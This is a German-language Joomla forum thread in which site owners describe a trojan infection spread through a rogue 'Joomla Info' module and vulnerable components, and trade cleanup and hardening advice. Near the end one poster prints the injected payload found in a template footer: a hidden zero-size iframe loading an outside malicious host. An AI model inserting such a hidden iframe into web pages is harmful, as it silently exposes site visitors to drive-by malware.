keraM

Bei mir bringt die Suche u.a. diesen Link: http://www.joomlaportal.de/sicherhei...stats-php.info

Edit: Ups, sehe gerade, daß Du diesen Thread ja schon gefunden hast. Hatte jetzt kurzzeitig die Ü verloren in dem Fensterwirrwarr.

Und nein, mit der Deaktivierung des Moduls ist es nicht getan, da der Schadcode bereits implementiert wurde und auf das Modul nicht mehr angewiesen ist.

Edit 2:
rickkp hat alle nötigen Schritte genannt. Was genau ist denn unklar daran?

__________________
Gruß keraM
Joomla-FAQ: --> Klick!
Kein Support per PN!

SailingSmoky

Also, ich bin ebenfalls diesem Trojaner zum Opfer gefallen und habe allerdings in diesem Forum keine weiteren Hinweise zur "Entwanzung" gefunden. Daher poste ich meine eigenen Erfahrungen als Kammerjäger:

Google half zuerst einmal mit einem Verweis auf diesen Beitrag
Ein Blick in den Seitenquelltext führte zu der Erkenntnis, das die böse Zeile:
durch die Anweisung
im Template eingefügt wurde.
Ein Blick in die Liste der Module, die auf der Position 'left' erscheinen sollen, führte dann schnell zu einem Eintrag 'Custom Module' mit dem Titel: 'Joomla Info'. Nachdem ich dieses Modul deaktiviert hatte, war die Wanze verschwunden.

Es bleiben allerdings einige offene Fragen:

• Wie konnte dieser Code von aussen eingeschleußt werden?
• Wo in der Datenbank steht der Code?
• War das 'Custom Module' schon vorher da oder wurde es erst durch den ´Befall´ eingeführt?
• Kann ich verhindern, dass ich wieder von diesem Trojaner befallen werde?

Fragen über Fragen.... Gruß, Peter

__________________
Peter

rickkp

Du wirst entweder unsichere Komponenten am laufen haben, die Rechte deiner Ordner und Dateien falsch gesetzt oder die allgemeinen Sicherheitsregeln zu register globals - magic quotes usw nicht beachtet haben.

Schau dir meine Signatur an und dieses Forum Sicherheit.
Vergleiche die Komponenten mit deinen installierten und befolge die Sicherheitshinweise die hier empfohlen werden.

__________________
Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung
Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 | Dateien 644 | 777 du wirst gehackt!
Info: Privat Support nur gegen Vorkasse

SailingSmoky

Danke für die schnelle Antwort. Ich habe noch mal alles durchgecheckt und erst mal keine groben Schnitzer gefunden. Ich habe noch zusätzlich das erweiterte .htaccess eingebaut, möglicherweise hilft es.

OK, die Links sind hilfreich, bisher konnte ich allerdings nichts relevantes finden. Die einzige verdächtige Komponente wäre vielleicht Exposé, die habe ich aber nach einem Angriff im letzten Jahr auf dem neuesten Stand.

Die logs zeigen einen verdächtigen Angriffsversuch, nämlich:
Auf welchen Exploit würde das deuten? Google hatte darauf keine Joomla bezügliche Antwort, die ich verstanden hätte. *grübel*
Bei dem Versuch diese URL einzugeben, kam dann auch die Meldung "Restricted Access"

Noch immer ein wenig unsicher... Peter

__________________
Peter

chw

Wie lautet denn die ganze Zeile? Steht da ein "200" dahinter?

An Deiner Stelle wäre ich sogar sehr besorgt, denn wenn es dem Angreifer einmal gelingt Dateien auf Deinem Webspace abzulegen dann wird er es vermutlich wieder tun können, solange die offensichtlich vorhandene Lücke weiterhin exisitiert. Da hilft meistens auch eine htaccess nicht weiter, da vermutlich schon einige php shells auf Deiner Seite lagern.

SailingSmoky

Hier die Kopie einer Log-Zeile, mit einer 200 drin! .
Bin ich auch, daher meine hartnäckige Arbeit an der Sache!
Scheint 'ihm' gelungen zu sein. Im "Exposé ../img" Verzeichnis wurde ich dann fündig. Kann allerdings sein, das da noch Reste vom letzten Überfall drin waren.
Habe daher Expose rausgeworfen, alles weggeräumt und neu installiert. Ich hatte 4.6.1 plus patch, jetzt ist 4.6.2 installiert. Naja bis zum mächsten Mal, ich habe leider noch keinen Ersatz für Expose.
Ein Vergleich mit einer älteren Sicherung brachte auch tatsächlich Änderungen im Expose Verzeichnis zu Tage, andere Bereiche scheinen clean zu sein.

Danke für die Hilfe.

Peter (Jetzt ein wenig beruhigter... )

__________________
Peter

chw

Das löschend der offensichtlichen Hackerdateien alleine ist immer mit einer enormen unsicherheit verbunden ob da nicht doch eine Backdoor installiert ist.
Daher gebe ich immer den Tip die komplette Seite zu löschen und neu aufzuspielen. Die Dateien die arbeit machen (Template usw.) von Hand überprüfen, genauso wie die DB.

Poste mal den relevanten Teil (register_globals usw) Deiner php Konfiguration. Die 200 hinten an der Zeile besagt nur das der Aufruf erfolgreich war, ob es auch möglich war Code einzuschleußen lässt sich so nicht sagen.

p_t

Bei mir war wohl alphacontent 2.5.5 das Einfallstor. Es wurde ebenfalls ein Modul "Joomla Info" erstellt, welches dann den Code aus Beitrag 6 auf allen Seiten einfügte. Scheinbar wurde auch 'RG_EMULATION' in der globals.php auf 1 / ON gestellt.

In components/com_alphacontent habe ich dann eine Datei gefunden, die dort nicht hingehört: alphacontent.inc.php. Knapp 2500 Zeilen Code, meine PHP Kenntnisse reichen aber nicht aus um zu sagen, was dieses Script alles macht...

Nachtrag: Im Bereich des Footer meines Templates (firestarter) habe ich weiteren Code gefunden:

<iframe src="http://in-in.in/in/" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></

Als ich die betroffene index.php im Dreamweaver geöffnet habe, ist mein Rechner automatisch runtergefahren und mit einer Boot Virus Warnung neu gestartet. Meine Empfehlung: Den Scheiß nur in einem reinen Text-Editor öffnen!

Die befallenen Dateien hatten das selbe Datum in WS_FTP.

Konfiguration: Joomla 1.0.12 mit alphacontent 2.5.5 (werde ich jetzt beides updaten)

Angehängte Dateien

alphacontent.inc.php.txt (86.2 KB, 8x aufgerufen)